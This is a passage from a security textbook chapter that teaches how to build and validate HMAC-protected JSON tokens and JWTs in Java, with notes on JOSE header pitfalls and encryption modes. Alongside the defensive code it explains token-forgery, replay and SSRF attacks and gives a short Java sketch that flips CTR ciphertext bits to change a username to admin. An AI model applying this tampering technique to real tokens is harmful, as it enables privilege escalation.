- Cross-origin API calls can be enabled for web clients using CORS. Enabling cookies on cross-origin calls is error-prone and becoming more difficult over time. HTML 5 Web Storage provides an alternative to cookies for storing tokens directly.
- Web Storage prevents CSRF attacks but can be more vulnerable to token exfiltration via XSS. You should ensure that you prevent XSS attacks before moving to this token storage model.
- The standard Bearer authentication scheme for HTTP can be used to transmit a token to an API, and to prompt for one if not supplied. While originally designed for OAuth2, the scheme is now widely used for other forms of tokens.
- Authentication tokens should be hashed when stored in a database to prevent them being used if the database is compromised. Message authentication codes (MACs) can be used to protect tokens against tampering and forgery. Hash-based MAC (HMAC) is a standard secure algorithm for constructing a MAC from a secure hash algorithm such as SHA-256.
- Database access controls and row-level security policies can be used to further harden a database against attacks, limiting the damage that can be done. Database encryption can be used to protect sensitive attributes but is a complex topic with many failure cases.
6 Self-contained tokens and JWTs
You’ve shifted the Natter API over to using the database token store with tokens
stored in Web Storage. The good news is that Natter is really taking off. Your user
base has grown to millions of regular users. The bad news is that the token database
is struggling to cope with this level of traffic. You’ve evaluated different database
backends, but you’ve heard about stateless tokens that would allow you to get rid of
the database entirely. Without a database slowing you down, Natter will be able to
scale up as the user base continues to grow. In this chapter, you’ll implement self-
contained tokens securely, and examine some of the security trade-offs compared
to database-backed tokens. You’ll also learn about the JSON Web Token (JWT) stan-
dard that is the most widely used token format today.
This chapter covers
Scaling token-based authentication with
encrypted client-side storage
Protecting tokens with MACs and authenticated
encryption
Generating standard JSON Web Tokens
Handling token revocation when all the state is
on the client
DEFINITION
JSON Web Tokens (JWTs, pronounced “jots”) are a standard for-
mat for self-contained security tokens. A JWT consists of a set of claims about
a user represented as a JSON object, together with a header describing the
format of the token. JWTs are cryptographically protected against tampering
and can also be encrypted.
6.1 Storing token state on the client
The idea behind stateless tokens is simple. Rather than store the token state in the
database, you can instead encode that state directly into the token ID and send it to
the client. For example, you could serialize the token fields into a JSON object, which
you then Base64url-encode to create a string that you can use as the token ID. When
the token is presented back to the API, you then simply decode the token and parse
the JSON to recover the attributes of the session.
Listing 6.1 shows a JSON token store that does exactly that. It uses short keys for attributes, such as sub for the subject (username) and exp for the expiry time, to save space. These are standard JWT attributes, as you'll learn in section 6.2.1. Leave the revoke method blank for now; you will come back to that shortly in section 6.5. Navigate to the src/main/java/com/manning/apisecurityinaction/token folder and create a new file JsonTokenStore.java in your editor. Type in the contents of listing 6.1 and save the new file.
WARNING
This code is not secure on its own because pure JSON tokens can
be altered and forged. You’ll add support for token authentication in sec-
tion 6.1.1.
Listing 6.1  The JSON token store

package com.manning.apisecurityinaction.token;

import org.json.*;
import spark.Request;

import java.time.Instant;
import java.util.*;

import static java.nio.charset.StandardCharsets.UTF_8;

public class JsonTokenStore implements TokenStore {

    @Override
    public String create(Request request, Token token) {
        // Convert the token attributes into a JSON object.
        var json = new JSONObject();
        json.put("sub", token.username);
        json.put("exp", token.expiry.getEpochSecond());
        json.put("attrs", token.attributes);

        // Encode the JSON object with URL-safe Base64-encoding.
        var jsonBytes = json.toString().getBytes(UTF_8);
        return Base64url.encode(jsonBytes);
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        try {
            // To read the token, decode it and parse the JSON
            // to recover the attributes.
            var decoded = Base64url.decode(tokenId);
            var json = new JSONObject(new String(decoded, UTF_8));
            var expiry = Instant.ofEpochSecond(json.getInt("exp"));
            var username = json.getString("sub");
            var attrs = json.getJSONObject("attrs");
            var token = new Token(expiry, username);
            for (var key : attrs.keySet()) {
                token.attributes.put(key, attrs.getString(key));
            }
            return Optional.of(token);
        } catch (JSONException e) {
            return Optional.empty();
        }
    }

    @Override
    public void revoke(Request request, String tokenId) {
        // TODO: leave the revoke method blank for now.
    }
}
6.1.1 Protecting JSON tokens with HMAC
Of course, as it stands, this code is completely insecure. Anybody can log in to the API
and then edit the encoded token in their browser to change their username or other
security attributes! In fact, they can just create a brand-new token themselves without
ever logging in. You can fix that by reusing the HmacTokenStore that you created in
chapter 5, as shown in figure 6.1. By appending an authentication tag computed with
a secret key known only to the API server, an attacker is prevented from either creat-
ing a fake token or altering an existing one.
To enable HMAC-protected tokens, open Main.java in your editor and change the
code that constructs the DatabaseTokenStore to instead create a JsonTokenStore:
TokenStore tokenStore = new JsonTokenStore();           // Construct the JsonTokenStore.
tokenStore = new HmacTokenStore(tokenStore, macKey);    // Wrap it in a HmacTokenStore
var tokenController = new TokenController(tokenStore);  // to ensure authenticity.
You can try it out to see your first stateless token in action:
$ curl -H 'Content-Type: application/json' -u test:password \
-X POST https://localhost:4567/sessions
{"token":"eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNTU5NTgyMTI5LCJhdHRycyI6e319.
➥ INFgLC3cAhJ8DjzPgQfHBHvU_uItnFjt568mQ43V7YI"}
Pop quiz

1  Which of the STRIDE threats does the HmacTokenStore protect against? (There may be more than one correct answer.)
   a  Spoofing
   b  Tampering
   c  Repudiation
   d  Information disclosure
   e  Denial of service
   f  Elevation of privilege

The answer is at the end of the chapter.
{"sub":"test","exp":12345,...}
URL-safe Base64
eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxMjM0NSwuLi59
HMAC-SHA256
URL-safe Base64
eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxMjM0NSwuLi59.dnYUdylHgTGpNcv39ol...
f9d9d851dca5...
JSON claims are encoded into
URL-safe Base64 encoding.
The encoded token is
authenticated with HMAC.
The HMAC tag is
encoded and appended
to the token.
Key
Figure 6.1
An HMAC tag is computed over the encoded JSON claims using a secret key.
The HMAC tag is then itself encoded into URL-safe Base64 format and appended to the
token, using a period as a separator. As a period is not a valid character in Base64
encoding, you can use this to find the tag later.
6.2 JSON Web Tokens
Authenticated client-side tokens have become very popular in recent years, thanks in
part to the standardization of JSON Web Tokens in 2015. JWTs are very similar to the
JSON tokens you have just produced, but have many more features:
- A standard header format that contains metadata about the JWT, such as which MAC or encryption algorithm was used.
- A set of standard claims that can be used in the JSON content of the JWT, with defined meanings, such as exp to indicate the expiry time and sub for the subject, just as you have been using.
- A wide range of algorithms for authentication and encryption, as well as digital signatures and public key encryption that are covered later in this book.
Because JWTs are standardized, they can be used with lots of existing tools, libraries,
and services. JWT libraries exist for most programming languages now, and many
API frameworks include built-in support for JWTs, making them an attractive format
to use. The OpenID Connect (OIDC) authentication protocol that’s discussed in
chapter 7 uses JWTs as a standard format to convey identity claims about users
between systems.
A basic authenticated JWT is almost exactly like the HMAC-authenticated JSON
tokens that you produced in section 6.1.1, but with an additional JSON header that
indicates the algorithm and other details of how the JWT was produced, as shown in
figure 6.2. The Base64url-encoded format used for JWTs is known as the JWS Compact
Serialization. JWS also defines another format, but the compact serialization is the most
widely used for API tokens.
The JWT standards zoo

While JWT itself is just one specification (https://tools.ietf.org/html/rfc7519), it builds on a collection of standards collectively known as JSON Object Signing and Encryption (JOSE). JOSE itself consists of several related standards:

- JSON Web Signature (JWS, https://tools.ietf.org/html/rfc7515) defines how JSON objects can be authenticated with HMAC and digital signatures.
- JSON Web Encryption (JWE, https://tools.ietf.org/html/rfc7516) defines how to encrypt JSON objects.
- JSON Web Key (JWK, https://tools.ietf.org/html/rfc7517) describes a standard format for cryptographic keys and related metadata in JSON.
- JSON Web Algorithms (JWA, https://tools.ietf.org/html/rfc7518) then specifies signing and encryption algorithms to be used.

JOSE has been extended over the years by new specifications to add new algorithms and options. It is common to use JWT to refer to the whole collection of specifications, although there are uses of JOSE beyond JWTs.
The flexibility of JWT is also its biggest weakness, as several attacks have been found
in the past that exploit this flexibility. JOSE is a kit-of-parts design, allowing develop-
ers to pick and choose from a wide variety of algorithms, and not all combinations
of features are secure. For example, in 2015 the security researcher Tim McClean
discovered vulnerabilities in many JWT libraries (http://mng.bz/awKz) in which an
attacker could change the algorithm header in a JWT to influence how the recipient
validated the token. It was even possible to change it to the value none, which
instructed the JWT library to not validate the signature at all! These kinds of security
flaws have led some people to argue that JWTs are inherently insecure due to the
ease with which they can be misused, and the poor security of some of the standard
algorithms.
I’ll let you come to your own conclusions about whether to use JWTs. In this chapter
you’ll see how to implement some of the features of JWTs from scratch, so you can
decide if the extra complexity is worth it. There are many cases in which JWTs cannot
be avoided, so I’ll point out security best practices and gotchas so that you can use
them safely.
PASETO: An alternative to JOSE
The error-prone nature of the standards has led to the development of alternative for-
mats intended to be used for many of the same purposes as JOSE but with fewer
tricky implementation details and opportunities for misuse. One example is PASETO
(https://paseto.io), which provides either symmetric authenticated encryption or pub-
lic key signed JSON objects, covering many of the same use-cases as the JOSE and
JWT standards. The main difference from JOSE is that PASETO only allows a devel-
oper to specify a format version. Each version uses a fixed set of cryptographic algo-
rithms rather than allowing a wide choice of algorithms: version 1 requires widely
implemented algorithms such as AES and RSA, while version 2 requires more modern
but less widely implemented algorithms such as Ed25519. This gives an attacker
much less scope to confuse the implementation and the chosen algorithms have few
known weaknesses.
Figure 6.2  The JWS Compact Serialization consists of three URL-safe Base64-encoded parts, separated by periods: first the header, then the payload or claims, and finally the authentication tag or signature. For example: eyJ0eXAiOiJKV1Qi.eyJzdWIiOiJ0.QlZiSNH2tt5sFTmfn (values shortened for display).
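To illustrate, the three parts of a compact-serialized JWS can be separated by splitting on periods. This is just a sketch, and the jws variable is assumed to hold a serialized token:

// A minimal sketch: splitting a JWS compact serialization on periods.
var parts = jws.split("\\.");
var encodedHeader = parts[0];  // Base64url-encoded JOSE header
var encodedClaims = parts[1];  // Base64url-encoded claims set (payload)
var encodedTag    = parts[2];  // Base64url-encoded HMAC tag or signature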
6.2.1 The standard JWT claims
One of the most useful parts of the JWT specification is the standard set of JSON
object properties defined to hold claims about a subject, known as a claims set. You’ve
already seen two standard JWT claims, because you used them in the implementation
of the JsonTokenStore:
- The exp claim indicates the expiry time of a JWT in UNIX time, which is the number of seconds since midnight on January 1, 1970 in UTC.
- The sub claim identifies the subject of the token: the user. Other claims in the token are generally making claims about this subject.
JWT defines a handful of other claims too, which are listed in table 6.1. To save space,
each claim is represented with a three-letter JSON object property.
Of these claims, only the issuer, issued-at, and subject claims express a positive state-
ment. The remaining fields all describe constraints on how the token can be used
rather than making a claim. These constraints are intended to prevent certain kinds
of attacks against security tokens, such as replay attacks in which a token sent by a genu-
ine party to a service to gain access is captured by an attacker and later replayed so
that the attacker can gain access. Setting a short expiry time can reduce the window of
opportunity for such attacks, but not eliminate them. The JWT ID can be used to add
a unique value to a JWT, which the recipient can then remember until the token
expires to prevent the same token being replayed. Replay attacks are largely pre-
vented by the use of TLS but can be important if you have to send a token over an
insecure channel or as part of an authentication protocol.
Table 6.1  Standard JWT claims

iss (Issuer): Indicates who created the JWT. This is a single string and often the URI of the authentication service.
aud (Audience): Indicates who the JWT is for. An array of strings identifying the intended recipients of the JWT. If there is only a single value, then it can be a simple string value rather than an array. The recipient of a JWT must check that its identifier appears in the audience; otherwise, it should reject the JWT. Typically, this is a set of URIs for APIs where the token can be used.
iat (Issued-At): The UNIX time at which the JWT was created.
nbf (Not-Before): The JWT should be rejected if used before this time.
exp (Expiry): The UNIX time at which the JWT expires and should be rejected by recipients.
sub (Subject): The identity of the subject of the JWT. A string. Usually a username or other unique identifier.
jti (JWT ID): A unique ID for the JWT, which can be used to detect replay.
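As a small illustration of the jti claim, with the Nimbus library used later in this chapter you could add a unique ID when building the claims set. The random UUID choice here is my own; any unpredictable unique value works:

import java.util.UUID;
import com.nimbusds.jwt.JWTClaimsSet;

// Sketch: adding a unique jti claim so recipients can detect replay.
var claims = new JWTClaimsSet.Builder()
        .subject("test")
        .jwtID(UUID.randomUUID().toString())  // random, effectively unique ID
        .build();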
DEFINITION
A replay attack occurs when an attacker captures a token sent by a
legitimate party and later replays it on their own request.
The issuer and audience claims can be used to prevent a different form of replay
attack, in which the captured token is replayed against a different API than the origi-
nally intended recipient. If the attacker replays the token back to the original issuer,
this is known as a reflection attack, and can be used to defeat some kinds of authentica-
tion protocols if the recipient can be tricked into accepting their own authentication
messages. By verifying that your API server is in the audience list, and that the token
was issued by a trusted party, these attacks can be defeated.
6.2.2 The JOSE header
Most of the flexibility of the JOSE and JWT standards is concentrated in the header,
which is an additional JSON object that is included in the authentication tag and con-
tains metadata about the JWT. For example, the following header indicates that the
token is signed with HMAC-SHA-256 using a key with the given key ID:
{
  "alg": "HS256",
  "kid": "hmac-key-1"
}
Although seemingly innocuous, the JOSE header is one of the more error-prone
aspects of the specifications, which is why the code you have written so far does not
generate a header, and I often recommend that they are stripped when possible to
create (nonstandard) headless JWTs. This can be done by removing the header section
produced by a standard JWT library before sending it and then recreating it again
before validating a received JWT. Many of the standard headers defined by JOSE can
open your API to attacks if you are not careful, as described in this section.
DEFINITION
A headless JWT is a JWT with the header removed. The recipient
recreates the header from expected values. For simple use cases where you
control the sender and recipient this can reduce the size and attack surface of
using JWTs but the resulting JWTs are nonstandard. Where headless JWTs
can’t be used, you should strictly validate all header values.
The tokens you produced in section 6.1.1 are effectively headless JWTs and adding a
JOSE header to them (and including it in the HMAC calculation) would make them
standards-compliant. From now on you’ll use a real JWT library, though, rather than
writing your own.
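To make the idea concrete, here is a minimal sketch of stripping and restoring a header. The helper names are my own, and this is not code from the Natter API:

// Sender: strip the Base64url-encoded header from "header.claims.tag".
static String stripHeader(String jwt) {
    return jwt.substring(jwt.indexOf('.') + 1);
}

// Recipient: re-attach the header you expect before validating, so a
// header supplied by an attacker is never used.
static String restoreHeader(String headless, String expectedHeader) {
    return expectedHeader + "." + headless;
}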
THE ALGORITHM HEADER
The alg header identifies the JWS or JWE cryptographic algorithm that was used to
authenticate or encrypt the contents. This is also the only mandatory header value.
The purpose of this header is to enable cryptographic agility, allowing an API to change
the algorithm that it uses while still processing tokens issued using the old algorithm.
DEFINITION
Cryptographic agility is the ability to change the algorithm used for
securing messages or tokens in case weaknesses are discovered in one algo-
rithm or a more performant alternative is required.
Although this is a good idea, the design in JOSE is less than ideal because the recipi-
ent must rely on the sender to tell them which algorithm to use to authenticate the
message. This violates the principle that you should never trust a claim that you have
not authenticated, and yet you cannot authenticate the JWT until you have processed
this claim! This weakness was what allowed Tim McClean to confuse JWT libraries by
changing the alg header.
A better solution is to store the algorithm as metadata associated with a key on the
server. You can then change the algorithm when you change the key, a methodology I
refer to as key-driven cryptographic agility. This is much safer than recording the algo-
rithm in the message, because an attacker has no ability to change the keys stored on
your server. The JSON Web Key (JWK) specification allows an algorithm to be associ-
ated with a key, as shown in listing 6.2, using the alg attribute. JOSE defines standard
names for many authentication and encryption algorithms and the standard name for
HMAC-SHA256 that you’ll use in this example is HS256. A secret key used for HMAC
or AES is known as an octet key in JWK, as the key is just a sequence of random bytes
and octet is an alternative word for byte. The key type is indicated by the kty attribute
in a JWK, with the value oct used for octet keys.
DEFINITION
In key-driven cryptographic agility, the algorithm used to authenti-
cate a token is stored as metadata with the key on the server rather than as a
header on the token. To change the algorithm, you install a new key. This
prevents an attacker from tricking the server into using an incompatible
algorithm.
Listing 6.2  A JWK with algorithm claim

{
  "kty": "oct",
  "alg": "HS256",
  "k": "9ITYj4mt-TLYT2b_vnAyCVurks1r2uzCLw7sOxg-75g"
}

The alg attribute indicates the algorithm the key is to be used for, and the k attribute holds the Base64url-encoded bytes of the key itself.
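With the Nimbus library that you'll meet in section 6.2.3, you can read the algorithm from the key itself rather than from the token. A minimal sketch, where jwkJson is assumed to hold the JSON from listing 6.2:

import com.nimbusds.jose.jwk.JWK;

// Sketch: read the algorithm from the stored key's metadata,
// not from the (attacker-controlled) token header.
var jwk = JWK.parse(jwkJson);
var alg = jwk.getAlgorithm();   // HS256, taken from the key's alg attribute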
The JWE specification also includes an enc header that specifies the cipher used to
encrypt the JSON body. This header is less error-prone than the alg header, but you
should still validate that it contains a sensible value. Encrypted JWTs are discussed in
section 6.3.3.
SPECIFYING THE KEY IN THE HEADER
To allow implementations to periodically change the key that they use to authenticate
JWTs, in a process known as key rotation, the JOSE specifications include several ways to
indicate which key was used. This allows the recipient to quickly find the right key to
verify the token, without having to try each key in turn. The JOSE specs include one
safe way to do this (the kid header) and two potentially dangerous alternatives listed
in table 6.2.
DEFINITION
Key rotation is the process of periodically changing the keys used
to protect messages and tokens. Changing the key regularly ensures that the
usage limits for a key are never reached and if any one key is compromised
then it is soon replaced, limiting the time in which damage can be done.
DEFINITION
A server-side request forgery (SSRF) attack occurs when an attacker
can cause a server to make outgoing network requests under the attacker’s
control. Because the server is on a trusted network behind a firewall, this
allows the attacker to probe and potentially attack machines on the internal
network that they could not otherwise access. You’ll learn more about SSRF
attacks and how to prevent them in chapter 10.
Table 6.2  Indicating the key in a JOSE header

kid (a key ID): Safe. As the key ID is just a string identifier, it can be safely looked up in a server-side set of keys.
jwk (the full key): Not safe. Trusting the sender to give you the key to verify a message loses all security properties.
jku (a URL to retrieve the full key): Not safe. The intention of this header is that the recipient can retrieve the key from an HTTPS endpoint, rather than including it directly in the message, to save space. Unfortunately, this has all the issues of the jwk header, but additionally opens the recipient up to SSRF attacks.

There are also headers for specifying the key as an X.509 certificate (used in TLS). Parsing and validating X.509 certificates is very complex, so you should avoid these headers.
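For example, a server-side lookup keyed by the kid header might look like the following sketch. The loadKeysFromKeystore() helper and the map are hypothetical, not part of the Natter code:

// Sketch: look up the verification key by the kid header, server-side.
Map<String, SecretKey> keysById = loadKeysFromKeystore();  // hypothetical helper
var kid = signedJwt.getHeader().getKeyID();                // Nimbus JWSHeader
var key = keysById.get(kid);
if (key == null) {
    throw new JOSEException("Unknown key ID: " + kid);
}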
6.2.3 Generating standard JWTs
Now that you’ve seen the basic idea of how a JWT is constructed, you’ll switch to using
a real JWT library for generating JWTs for the rest of the chapter. It’s always better to
use a well-tested library for security when one is available. There are many JWT and
JOSE libraries for most programming languages, and the https://jwt.io website main-
tains a list. You should check that the library is actively maintained and that the devel-
opers are aware of historical JWT vulnerabilities such as the ones mentioned in this
chapter. For this chapter, you can use Nimbus JOSE + JWT from https://connect2id
.com/products/nimbus-jose-jwt, which is a well-maintained open source (Apache 2.0
licensed) Java JOSE library. Open the pom.xml file in the Natter project root folder and
add the following dependency to the dependencies section to load the Nimbus library:
<dependency>
  <groupId>com.nimbusds</groupId>
  <artifactId>nimbus-jose-jwt</artifactId>
  <version>8.19</version>
</dependency>
Listing 6.3 shows how to use the library to generate a signed JWT. The code is generic
and can be used with any JWS algorithm, but for now you’ll use the HS256 algorithm,
which uses HMAC-SHA-256, just like the existing HmacTokenStore. The Nimbus
library requires a JWSSigner object for generating signatures, and a JWSVerifier for
verifying them. These objects can often be used with several algorithms, so you should
also pass in the specific algorithm to use as a separate JWSAlgorithm object. Finally,
you should also pass in a value to use as the audience for the generated JWTs. This
should usually be the base URI of the API server, such as https:/ /localhost:4567. By
setting and verifying the audience claim, you ensure that a JWT can’t be used to access
a different API, even if they happen to use the same cryptographic key. To produce
the JWT you first build the claims set, set the sub claim to the username, the exp claim
to the token expiry time, and the aud claim to the audience value you got from the
constructor. You can then set any other attributes of the token as a custom claim,
which will become a nested JSON object in the claims set. To sign the JWT you then
set the correct algorithm in the header and use the JWSSigner object to calculate the
signature. The serialize() method will then produce the JWS Compact Serialization
of the JWT to return as the token identifier. Create a new file named SignedJwtTokenStore.java under src/main/java/com/manning/apisecurityinaction/token and copy the contents of the listing.
Listing 6.3  Generating a signed JWT

package com.manning.apisecurityinaction.token;

import javax.crypto.SecretKey;
import java.text.ParseException;
import java.util.*;

import com.nimbusds.jose.*;
import com.nimbusds.jwt.*;
import spark.Request;

public class SignedJwtTokenStore implements TokenStore {
    private final JWSSigner signer;
    private final JWSVerifier verifier;
    private final JWSAlgorithm algorithm;
    private final String audience;

    public SignedJwtTokenStore(JWSSigner signer,
            JWSVerifier verifier, JWSAlgorithm algorithm,
            String audience) {
        // Pass in the algorithm, audience, and signer and verifier objects.
        this.signer = signer;
        this.verifier = verifier;
        this.algorithm = algorithm;
        this.audience = audience;
    }

    @Override
    public String create(Request request, Token token) {
        // Create the JWT claims set with details about the token.
        var claimsSet = new JWTClaimsSet.Builder()
                .subject(token.username)
                .audience(audience)
                .expirationTime(Date.from(token.expiry))
                .claim("attrs", token.attributes)
                .build();
        // Specify the algorithm in the header and build the JWT.
        var header = new JWSHeader(JWSAlgorithm.HS256);
        var jwt = new SignedJWT(header, claimsSet);
        try {
            jwt.sign(signer);        // Sign the JWT using the JWSSigner object.
            return jwt.serialize();  // Convert the signed JWT into the
                                     // JWS compact serialization.
        } catch (JOSEException e) {
            throw new RuntimeException(e);
        }
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        // TODO
        return Optional.empty();
    }

    @Override
    public void revoke(Request request, String tokenId) {
        // TODO
    }
}
To use the new token store, open the Main.java file in your editor and change the
code that constructs the JsonTokenStore and HmacTokenStore to instead construct a
SignedJwtTokenStore. You can reuse the same macKey that you loaded for the Hmac-
TokenStore, as you’re using the same algorithm for signing the JWTs. The code
should look like the following, using the MACSigner and MACVerifier classes for sign-
ing and verification using HMAC:
var algorithm = JWSAlgorithm.HS256;
var signer = new MACSigner((SecretKey) macKey);      // Construct the MACSigner and
var verifier = new MACVerifier((SecretKey) macKey);  // MACVerifier with the macKey.
TokenStore tokenStore = new SignedJwtTokenStore(     // Pass the signer, verifier,
    signer, verifier, algorithm,                     // algorithm, and audience to
    "https://localhost:4567");                       // the SignedJwtTokenStore.
var tokenController = new TokenController(tokenStore);
You can now restart the API server, create a test user, and log in to see the created JWT:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
$ curl -H 'Content-Type: application/json' -u test:password \
-d '' https://localhost:4567/sessions
{"token":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ0ZXN0IiwiYXVkIjoiaHR0cH
➥ M6XC9cL2xvY2FsaG9zdDo0NTY3IiwiZXhwIjoxNTc3MDA3ODcyLCJhdHRycyI
➥ 6e319.nMxLeSG6pmrPOhRSNKF4v31eQZ3uxaPVyj-Ztf-vZQw"}
You can take this JWT and paste it into the debugger at https://jwt.io to validate it and
see the contents of the header and claims, as shown in figure 6.3.
WARNING
While jwt.io is a great debugging tool, remember that JWTs are credentials, so you should never post JWTs from a production environment into any website.

Figure 6.3  The JWT in the jwt.io debugger. The panels on the right show the decoded header and payload and let you paste in your key to validate the JWT. Never paste a JWT or key from a production environment into a website.
6.2.4 Validating a signed JWT
To validate a JWT, you first parse the JWS Compact Serialization format and then use
the JWSVerifier object to verify the signature. The Nimbus MACVerifier will calcu-
late the correct HMAC tag and then compare it to the tag attached to the JWT using a
constant-time equality comparison, just like you did in the HmacTokenStore. The Nimbus library also takes care of basic security checks, such as making sure that the algorithm header is compatible with the verifier (preventing the algorithm mix-up attacks
discussed in section 6.2), and that there are no unrecognized critical headers. After
the signature has been verified, you can extract the JWT claims set and verify any con-
straints. In this case, you just need to check that the expected audience value appears
in the audience claim, and then set the token expiry from the JWT expiry time claim.
The TokenController will ensure that the token hasn’t expired. Listing 6.4 shows the
full JWT validation logic. Open the SignedJwtTokenStore.java file and replace the
read() method with the contents of the listing.
Listing 6.4  Validating a signed JWT

@Override
public Optional<Token> read(Request request, String tokenId) {
    try {
        // Parse the JWT and verify the HMAC signature
        // using the JWSVerifier.
        var jwt = SignedJWT.parse(tokenId);
        if (!jwt.verify(verifier)) {
            throw new JOSEException("Invalid signature");
        }

        var claims = jwt.getJWTClaimsSet();
        // Reject the token if the audience doesn't contain
        // your API's base URI.
        if (!claims.getAudience().contains(audience)) {
            throw new JOSEException("Incorrect audience");
        }

        var expiry = claims.getExpirationTime().toInstant();
        var subject = claims.getSubject();
        var token = new Token(expiry, subject);
        // Extract token attributes from the remaining JWT claims.
        var attrs = claims.getJSONObjectClaim("attrs");
        attrs.forEach((key, value) ->
                token.attributes.put(key, (String) value));

        return Optional.of(token);
    } catch (ParseException | JOSEException e) {
        // If the token is invalid, then return a generic failure response.
        return Optional.empty();
    }
}
You can now restart the API and use the JWT to create a new social space:
$ curl -H 'Content-Type: application/json' \
-H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ0ZXN
➥ 0IiwiYXVkIjoiaHR0cHM6XC9cL2xvY2FsaG9zdDo0NTY3IiwiZXhwIjoxNTc
➥ 3MDEyMzA3LCJhdHRycyI6e319.JKJnoNdHEBzc8igkzV7CAYfDRJvE7oB2md
➥ 6qcNgc_yM' -d '{"owner":"test","name":"test space"}' \
https://localhost:4567/spaces
{"name":"test space","uri":"/spaces/1"}
6.3 Encrypting sensitive attributes
A database in your datacenter, protected by firewalls and physical access controls, is a
relatively safe place to store token data, especially if you follow the hardening advice
in the last chapter. Once you move away from a database and start storing data on the
client, that data is much more vulnerable to snooping. Any personal information
about the user included in the token, such as name, date of birth, job role, work loca-
tion, and so on, may be at risk if the token is accidentally leaked by the client or stolen
though a phishing attack or XSS exfiltration. Some attributes may also need to be
kept confidential from the user themselves, such as any attributes that reveal details of
the API implementation. In chapter 7, you’ll also consider third-party client applica-
tions that may not be trusted to know details about who the user is.
Encryption is a complex topic with many potential pitfalls, but it can be used suc-
cessfully if you stick to well-studied algorithms and follow some basic rules. The goal
of encryption is to ensure the confidentiality of a message by converting it into an
obscured form, known as the ciphertext, using a secret key. The algorithm is known as
a cipher. The recipient can then use the same secret key to recover the original plain-
text message. When the sender and recipient both use the same key, this is known as
secret key cryptography. There are also public key encryption algorithms in which the
sender and recipient have different keys, but we won’t cover those in much detail in
this book.
An important principle of cryptography, known as Kerckhoffs' Principle, says that an encryption scheme should be secure even if every aspect of the algorithm is known, so long as the key remains secret.
NOTE
You should use only algorithms that have been designed through an
open process with public review by experts, such as the algorithms you’ll use
in this chapter.
Pop quiz

2  Which JWT claim is used to indicate the API server a JWT is intended for?
   a  iss
   b  sub
   c  iat
   d  exp
   e  aud
   f  jti

3  True or False: The JWT alg (algorithm) header can be safely used to determine which algorithm to use when validating the signature.

The answers are at the end of the chapter.
There are several secure encryption algorithms in current use, but the most important
is the Advanced Encryption Standard (AES), which was standardized in 2001 after an
international competition, and is widely considered to be very secure. AES is an exam-
ple of a block cipher, which takes a fixed size input of 16 bytes and produces a 16-byte
encrypted output. AES keys are either 128 bits, 192 bits, or 256 bits in size. To encrypt
more (or less) than 16 bytes with AES, you use a block cipher mode of operation. The
choice of mode of operation is crucial to the security as demonstrated in figure 6.4,
which shows an image of a penguin encrypted with the same AES key but with two dif-
ferent modes of operation.1 The Electronic Code Book (ECB) mode is completely
insecure and leaks a lot of details about the image, while the more secure Counter
Mode (CTR) eliminates any details and looks like random noise.
DEFINITION
A block cipher encrypts a fixed-sized block of input to produce a
block of output. The AES block cipher operates on 16-byte blocks. A block
cipher mode of operation allows a fixed-sized block cipher to be used to encrypt
messages of any length. The mode of operation is critical to the security of the
encryption process.
1 This is a very famous example known as the ECB Penguin. You’ll find the same example in many introductory
cryptography books.
Figure 6.4  An image of the Linux mascot, Tux, that has been encrypted by AES in ECB mode. The shape of the penguin and many features are still visible despite the encryption. By contrast, the same image encrypted with AES in CTR mode is indistinguishable from random noise. (Original image by Larry Ewing and The GIMP, https://commons.wikimedia.org/wiki/File:Tux.svg.)
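If you want to see where these modes appear in Java, the standard JCA transformation names are shown in the sketch below. This is purely illustrative, and neither mode by itself authenticates the data (see section 6.3.1):

import javax.crypto.Cipher;

// Standard JCA transformation names (getInstance throws checked
// exceptions if the algorithm is unavailable).
var ecbCipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); // insecure: leaks patterns
var ctrCipher = Cipher.getInstance("AES/CTR/NoPadding");    // hides patterns, unauthenticated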
6.3.1 Authenticated encryption
Many encryption algorithms only ensure the confidentiality of data that has been
encrypted and don’t claim to protect the integrity of that data. This means that an
attacker won’t be able to read any sensitive attributes in an encrypted token, but they
may be able to alter them. For example, if you know that a token is encrypted with
CTR mode and (when decrypted) starts with the string user=brian, you can change
this to read user=admin by simple manipulation of the ciphertext even though you
can’t decrypt the token. Although there isn’t room to go into the details here, this
kind of attack is often covered in cryptography tutorials under the name chosen cipher-
text attack.
DEFINITION
A chosen ciphertext attack is an attack against an encryption scheme
in which an attacker manipulates the encrypted ciphertext.
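The following toy sketch shows why CTR mode is malleable. The interceptedCiphertext() helper and the assumption that the plaintext starts at byte 0 of the ciphertext are hypothetical, for illustration only:

// Toy CTR-malleability demo: each ciphertext byte is pt ^ keystream,
// so XORing in (oldByte ^ newByte) changes the decrypted plaintext
// without knowing the key.
byte[] ct = interceptedCiphertext();   // hypothetical: encrypts "user=brian..."
int offset = "user=".length();         // position of the username
String oldName = "brian", newName = "admin";
for (int i = 0; i < oldName.length(); i++) {
    ct[offset + i] ^= oldName.charAt(i) ^ newName.charAt(i);
}
// ct now decrypts to "user=admin..." under the same key and nonce.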
In terms of threat models from chapter 1, encryption protects against information dis-
closure threats, but not against spoofing or tampering. In some cases, confidentiality
can also be lost if there is no guarantee of integrity because an attacker can alter a
message and then see what error message is generated when the API tries to decrypt
it. This often leaks information about what the message decrypted to.
LEARN MORE
You can learn more about how modern encryption algorithms
work, and attacks against them, from an up-to-date introduction to cryptogra-
phy book such as Serious Cryptography by Jean-Philippe Aumasson (No Starch
Press, 2018).
To protect against spoofing and tampering threats, you should always use algorithms
that provide authenticated encryption. Authenticated encryption algorithms combine an
encryption algorithm for hiding sensitive data with a MAC algorithm, such as HMAC,
to ensure that the data can’t be altered or faked.
DEFINITION
Authenticated encryption combines an encryption algorithm with
a MAC. Authenticated encryption ensures confidentiality and integrity of
messages.
One way to do this would be to combine a secure encryption scheme like AES in CTR
mode with HMAC. For example, you might make an EncryptedTokenStore that
encrypts data using AES and then combine that with the existing HmacTokenStore for
authentication. But there are two ways you could combine these two stores: first
encrypting and then applying HMAC, or, first applying HMAC and then encrypting
the token and the tag together. It turns out that only the former is generally secure
and is known as Encrypt-then-MAC (EtM). Because it is easy to get this wrong, cryptog-
